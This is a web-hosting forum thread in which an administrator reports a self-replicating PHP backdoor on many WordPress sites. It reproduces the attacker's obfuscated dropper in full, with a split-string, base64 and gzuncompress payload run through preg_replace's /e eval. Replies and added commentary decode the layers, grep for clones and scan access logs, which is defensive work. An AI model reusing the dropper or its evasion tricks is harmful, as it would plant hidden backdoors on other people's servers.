  #1 (Join Date: Apr 2013 | Location: Boston, MA | Posts: 390)

    Server is being raped by single php script being uploaded and requested several times

    Hello guys,

    Sorry for the title but this is really what's going on.

    The server has always high loads, is always super slow.

    It is a Xeon E3-1270 with 18gb of RAM, raid10 with about 300 domains. Hardware is not the problem.

    Please see this screenshot:

    http://d.pr/i/BilG

    those are only a few lines that I copied from the Apache server status page.
    Multiply those by 5.

    What happens is, a LOT of domains now have random 5-letter folders created in the root directory, and then a single index.php file is uploaded.

    This is the code of the index.php file; they are obfuscating it:

    Code:
    <?php $e="gzu"."ncom"."p"."re"."ss";$h="preg_re"."pl"."ace";$o="ba"."se6"."4_deco"."de";$h("/"."e"."k"."m"."qxe"."/e",$e($o("e"."F7NWFlv4kgQ/i8jIe"."08L"."MIHh7VPhCskJGEIYZK8oLbdB"."oO"."xiQ8I8+u3u9p9mGsI2pVGioj"."prvrqq7Pb4A0K/orRNosDFzuRi//65mWh"."k/pRWNIrvfVD"."15tsyFNJb5R0c7b038YlvQUL5k1zlKLVz5Ju0"."e/1G7"."Z6Oxm3HapcMtrkE8Ux2oG2VTKoiBfF"."Au9lPCdSFbbBv7f0a"."q2wot/A3zEr"."1Ztc"."pkptMYscByTr+cpT+jB+FSK5xf+GShGaoYk1Kn2aL+xGsatGV4jQ/"."Sr5TNI"."4wGEhARboWzkRkFK"."Zrlu/FoOdq3A6Zp9LH9k6oci8OqEqNhVlTqS"."Yi9w5NRNC/3B9NkB"."DN90psDr9O0igu2iiTiG"."F+UpLDaBSs0WxY5lV"."icoqoc9UQDsV/qsL4jjcH5pNNTNlIcPjCyAssgyk"."SkJcc"."eYxC4diau"."/rfnec5FUMFltR6izGaRbDGJJE5bYZj53PzX"."2quKdrDc/"."0DEdzK1Y"."duZZhOdWap+Eq8ipazWiY2NU1VM"."G"."i+sy3YPIRDjMVw0SeW29YrlFBul1HDc+2DN"."yokQXH"."sXVL04w6qusa"."lhUsh+3O6Y8GyzmLyMdLNH5Qy1H4Y6ME"."T50o3"."OA4LcjSqaxV2H+jthcOxc6HN2F6ttNFq"."olZENkoAEfM/vB512EABcs1c4pDek4Q"."CHE6UDCmwI8GAV0gQTZ"."esxf6APHykwTnLkyfO6NJZwQ5rt+"."Ox8NpZ9zskWeZaqPLE"."M6LErkmddcP8HSGUxqoFIdpAmb09X"."wN+wSq64f"."rLI"."Vh"."knP0PTBA5DRO"."lBp2fSwqPnc"."y559kNhktzAEQp87nCaiqE2aB7+2"."3O+APiqcClweYHcRk96gBQFZDq5vLGR48CHT8uQ6YvjjU"."mffQUOAvT5MgJrHG2G/"."fPb8LNGa92C6wAQ"."f7NJn7Xp"."7DnIVkxgP6xTzn+B4KEkzthO4xZqpMIU3J1k8d2kVnCep5"."zTsIjNDWtaApafUQ2WTSWtzL6X8aq+Dp"."Osaz6Qox+"."xDrLn2otpJSvUX"."+le"."k/Mr"."PoZ40tQV1"."bIKiLvHDrOVW1BN/87sfkX"."Q4u149D"."tKIZnk67/UFnOiU6ZWabP"."OplCVegC"."h2"."CP/0k7w"."0JTC2KoOP15PF"."u+SnMlcwTvVXQ56T"."1hhg2Ak"."jWh3DLjjFaskeZD90R+ZCdqRYBaVO"."gl"."MbZfg3gDZ"."1jD"."X91cSccFO9"."5"."cti4npyi8LF4yYb0G8h"."GaxySdDKKLIWFWt3OSeS5LlX3e08v8qZNeLpcnSNzfUZn"."v2cYLOejTpscWRlo/LbDYQi9v4Fi"."Be5gX1amtclWszDww2VBtXhqwOf5fNhI5IOgp"."K3dk73OD"."f7fzVtvWV7dBFcKPcxJKO3Ae7jZznZO76cgeEkP53Dne1"."gAU4"."tX9LCqz0n"."DhtK9F3SHJruD2yJnrWrrnMfleYocByeJ"."iOb+uUgTbtw"."t31/7s7efn4ltOMl7b5LhH1FjtA"."qS99fH"."x7f"."X0QK"."1mv6rP1/bq1GAu9vM6c2"."39+PGs"."r8w7/ut5qzf6yZ2zzL6vfedTa4/FKu12G4KGG0Tgs"."Z7kY0XZx6V+EVqkUShvB"."PJ110"."aiA"."XrEKj7DkuGcmnMo3xRSD1PLX"."B/
NE9/yBP/X"."DRpk5Yv7"."IDSp"."SOsEIATtcQ5"."Sg8LjS52L3C+Ko8C2gnNx/Hnai"."G8/41zZGF"."wKy/p15wJ"."hSC"."pb5OCC"."ptuNMX0hQQm4vq6c"."UKhinNEtcFmrcIAX"."FOsa1Rn"."f95E"."qffRG"."4kQ/L"."ZcF"."KvF+mDNnPi/"."8rHAgRkBStj"."QzGqd7"."sESf5Ee/bi5i2EaAQH5puOv9SAKZwy"."tcDkcdR6exp1ps90eKdd"."Dq3wqa2UJmvrg3O8U9l9nDqeMiC4vpe"."PDTAkEDU"."EyRxpb5W6fISGkysNbchl+GjAMS"."EtzOOw8gt/M+"."gXnoOOK"."TvlyU199"."LyEKydz7"."EPIHP/nRelpA9x7f/zMvNgyfu"."UZKUvkt5AQgIBVnxXHB"."05blrSiP2RcNqzcmzN6fjueIBetYdt"."Qd"."hnPpaecDeeYPHUY"."an2H6Zm+HvIdvcJz"."A7xFQBlw"."Q7wnSpnh6F"."tvZ3rbwKt/fHu6Da/n"."2"."cm+bHlpBhFzsklsU6WZK"."iDW0ZBQc"."QDbsKCKrlh/6"."9NgDeT1BHp6uICoigaxGLzrh6MS"."4t"."m+PjaRzIx"."5"."ulKcP"."TXD8mlPynKfq7Pr2/fs//wIl1Ulz")),"/e"."kmqx"."e/e"); ?>
    I put it also on pastebin: http://pastebin.com/sBvEsmCx

    The thing is, those files are being requested 24/7, slowing down the server, and I don't really know what's going on; I can't read what the index.php does. If the folders are deleted, new folders are created somehow.

    No spam is being sent as far as I'm concerned.

    Right now I am researching how I can add a custom signature to ClamAV, as it is the only way I came up with to block it...

    Does anybody know what's going on here?
    Can anybody help?

    Thank you.
    Last edited by v33usa; 11-22-2013 at 12:34 AM.
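The posted dropper stacks three tricks: function names split into `"gzu"."ncom"."p"` pieces so no signature sees `gzuncompress`, the real code shipped as a base64 blob of zlib-compressed PHP, and `preg_replace()` called with the `/e` modifier as the execution primitive (with `/e`, PHP evaluates the replacement string as code, and here the subject equals the pattern, so the decoded blob runs exactly once; it is `eval()` without the word). The following Python unpacker is an added example, not code from the thread; it reverses those layers statically, never runs the PHP, and builds its own constructed sample in the same shape because the real decoded payload is not on this page.

```python
"""Static unpacker for the dropper layout posted above: string-splitting of
function names, base64, gzuncompress(), and a preg_replace() /e call as the eval."""
import base64
import re
import zlib

VAR_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
# long runs of base64 characters; \s lets the line wrap in the paste through
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/=\s]{24,})"')
PREG_E = re.compile(r'preg_replace\(\s*"[^"]*/e"')


def collapse_concat(src: str) -> str:
    """Undo "gzu"."ncom"."p" -> "gzuncomp". The split exists only to defeat grep/AV signatures."""
    return re.sub(r'"\s*\.\s*"', '', src)


def resolve_aliases(src: str) -> str:
    """Inline $e="gzuncompress"; and friends so that $e(...) reads as gzuncompress(...)."""
    names = dict(VAR_ASSIGN.findall(src))
    src = VAR_ASSIGN.sub('', src)
    for var, fn in names.items():
        src = src.replace('$' + var + '(', fn + '(')
    return src


def uses_preg_e_eval(driver: str) -> bool:
    """preg_replace() with /e evaluates the *replacement* as PHP (the modifier was removed in PHP 7).
    The subject string equals the pattern, so the decoded blob executes once: eval() in disguise."""
    return PREG_E.search(driver) is not None


def unpack(src: str):
    """Return (readable driver, decoded inner payload bytes) without executing anything."""
    driver = resolve_aliases(collapse_concat(src))
    blobs = B64_LITERAL.findall(driver)
    if not blobs:
        raise ValueError('no base64 payload literal found')
    raw = base64.b64decode(max(blobs, key=len))   # stray whitespace is discarded by default
    # PHP gzuncompress() is zlib (RFC 1950) format; a gzinflate() variant would need zlib.decompress(raw, -15)
    return driver, zlib.decompress(raw)


def build_sample(inner_php: bytes) -> str:
    """Constructed sample in the same shape as the posted dropper (NOT the real payload)."""
    blob = base64.b64encode(zlib.compress(inner_php)).decode()
    chunked = '"."'.join(blob[i:i + 7] for i in range(0, len(blob), 7))
    return ('<?php $e="gzu"."ncom"."p"."re"."ss";$h="preg_re"."pl"."ace";'
            '$o="ba"."se6"."4_deco"."de";'
            '$h("/"."e"."k"."m"."qxe"."/e",$e($o("' + chunked + '")),"/e"."kmqx"."e/e"); ?>')


if __name__ == '__main__':
    drv, payload = unpack(build_sample(b"<?php echo 'decoded payload'; ?>"))
    print(drv)
    print(payload.decode())
```

Run it against the real file by reading it into `unpack()`; if the decoded payload is itself another base64/zlib layer (common with this family), feed the result back through `unpack()` until plain PHP comes out. Decoding on a workstation, never with `php -r`, is the point: the whole design of the file is that "reading" it with PHP executes it.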

  #2 (Join Date: May 2012 | Location: India | Posts: 1,026)
    It certainly looks like your domains are hacked and they have placed scripts of their own. Please go ahead and see how that was done, and remove asap.

  #3
    Ohoh,
    I've decoded your script:
    http://pastebin.com/k62t1RmA

    It's malware, delete it ASAP, and check the web access log to find out why it's there.

  #4 (Join Date: Apr 2013 | Location: Boston, MA | Posts: 390)
    The problem is that the scripts are being re-created or re-uploaded..

    All of the affected domains have the latest version of WordPress.
    Last edited by v33usa; 11-22-2013 at 03:26 AM.

  #5
    Of course,
    This malicious script will clone itself to every root-of-public-folder. So you have to find and delete them.

    If you're using cPanel, the root of public folder is /home/<user>/public_html/, so:

    Code:
    $ grep -r "b3JkZXIgYWxsb3csZGVueQo8RmlsZXNNYXRj" /home/*/public_html/
    will help you find the clones.

    To resolve this issue, though, you need to check the access log; "latest version of WordPress" does not mean the plugins have no bugs. Or the malicious script/backdoor has been on your server for a long time.
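A fixed-string grep like the one above only matches copies that contain that exact byte sequence; a re-obfuscated variant with a different blob slips past it. The script below is an added example, not from the thread, that keys on the structure described in #1 and #5 instead: it walks a `/home/<user>/public_html` layout, lists directories whose name is exactly five letters and whose only content is `index.php` (the five-letter rule is an assumption taken from the thread's description), classifies each file by obfuscation markers (the `"a"."b"` splitting undone first, then decoder names or a call whose first argument is a `/e` regex), and counts Apache access-log hits per flagged path so you can see which clients are hammering them. The directory tree and log lines it runs on are constructed inside `demo()`; run it against `/home` and your real access logs by calling `scan()` and `request_summary()` directly.

```python
"""Triage for the 'random five-letter folder + lone index.php' pattern: enumerate the clones
under every docroot, classify them by obfuscation markers, and tie them to access-log hits."""
import os
import re
import tempfile
from collections import Counter

DIR_NAME = re.compile(r'^[A-Za-z]{5}$')         # assumption: five letters, as described in the thread
CONCAT = re.compile(r'"\s*\.\s*"')               # the "gzu"."ncom" splitting
# any call whose first argument is a regex literal carrying the /e modifier: preg_replace-as-eval
EVAL_PATTERN = re.compile(r'\$?\w+\(\s*"[^"]*/e"\s*,')
MARKERS = ('gzuncompress', 'gzinflate', 'base64_decode', 'str_rot13', 'preg_replace', 'eval(')
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def looks_obfuscated(src: str) -> bool:
    """Undo the string splitting, then look for an /e eval or two or more decoder names."""
    joined = CONCAT.sub('', src)
    if EVAL_PATTERN.search(joined):
        return True
    return sum(m in joined for m in MARKERS) >= 2


def find_dropper_dirs(docroot: str):
    """Directories in the docroot named like 'abcde' that contain nothing but index.php."""
    hits = []
    for name in sorted(os.listdir(docroot)):
        path = os.path.join(docroot, name)
        if DIR_NAME.match(name) and os.path.isdir(path) and os.listdir(path) == ['index.php']:
            hits.append(path)
    return hits


def scan(home_root: str):
    """Walk a /home/<user>/public_html layout; return [(user, url path, obfuscated?)]."""
    results = []
    for user in sorted(os.listdir(home_root)):
        docroot = os.path.join(home_root, user, 'public_html')
        if not os.path.isdir(docroot):
            continue
        for d in find_dropper_dirs(docroot):
            with open(os.path.join(d, 'index.php'), encoding='utf-8', errors='replace') as fh:
                flagged = looks_obfuscated(fh.read())
            results.append((user, '/' + os.path.basename(d) + '/index.php', flagged))
    return results


def request_summary(log_lines, paths):
    """{url path: (total hits, top 3 client IPs)} from Apache combined-log lines."""
    hits = {p: Counter() for p in paths}
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, url, _status = m.groups()
        url = url.split('?', 1)[0]
        if url in hits:
            hits[url][ip] += 1
    return {p: (sum(c.values()), c.most_common(3)) for p, c in hits.items()}


# constructed sample in the posted shape (the blob is a placeholder, not the real payload)
SAMPLE_DROPPER = ('<?php $e="gzu"."ncom"."p"."re"."ss";$o="ba"."se6"."4_deco"."de";'
                  '$h="preg_re"."pl"."ace";$h("/"."x"."/e",$e($o("eJwDAAAAAAE=")),"/x/e"); ?>')
# constructed Apache combined-log lines (documentation IP ranges)
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Nov/2013:00:10:01 +0000] "GET /abcde/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Nov/2013:00:10:02 +0000] "POST /abcde/index.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [22/Nov/2013:00:10:03 +0000] "GET /qwert/index.php?q=1 HTTP/1.1" 200 512 "-" "curl/7.30"',
    '198.51.100.9 - - [22/Nov/2013:00:10:04 +0000] "GET /abcde/index.php HTTP/1.1" 200 512 "-" "curl/7.30"',
    '192.0.2.44 - - [22/Nov/2013:00:10:05 +0000] "GET /store/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [22/Nov/2013:00:10:06 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def demo():
    """Build a throwaway /home tree, scan it, and correlate with SAMPLE_LOG."""
    with tempfile.TemporaryDirectory() as home:
        def put(rel, body):
            p = os.path.join(home, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, 'w') as fh:
                fh.write(body)
        put('site1/public_html/abcde/index.php', SAMPLE_DROPPER)
        put('site1/public_html/wp-content/index.php', '<?php // Silence is golden.')
        put('site2/public_html/qwert/index.php', SAMPLE_DROPPER)
        put('site2/public_html/store/index.php', '<?php include "shop.php";')   # five letters, but clean
        found = scan(home)
    flagged = sorted({url for _user, url, bad in found if bad})
    return found, request_summary(SAMPLE_LOG, flagged)


if __name__ == '__main__':
    for row in demo()[0]:
        print(row)
    print(demo()[1])
```

Two caveats a practitioner would want. First, the directory shape alone is not proof (the clean `store/` above shows why), so act on the content classification and keep the shape check as a cheap pre-filter. Second, the counts tell you who is *using* the clones, not how they got there: the access-log entries to look for are the ones just before each clone's mtime (an upload through a vulnerable plugin, a `POST` to an unexpected script, or a legitimate login from an unfamiliar address), which is the lead #3 and #5 are pointing at.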

  #6 (Join Date: Apr 2011 | Location: Core Files | Posts: 7,790)
    Quote Originally Posted by v33usa View Post
    The problem is that the scripts are being re-created or re-uploaded..

    All of the affected domains have the latest version of WordPress.
    Unfortunately this is going to take some work:

    1. contact your host about the issue
    2. see if they offer any service to clean your entire account
    3. check to see if you have any clean backups
    4. have the host delete your account and restore a clean backup
    5. change the user name
    6. change passwords
    7. delete not needed plugins
    8. delete not needed themes

    That list is not an exact order of things to do, but when the exploit starts to recreate itself, in some cases all your files could have been affected, which could be hundreds to thousands.

    How many WordPress sites are there?
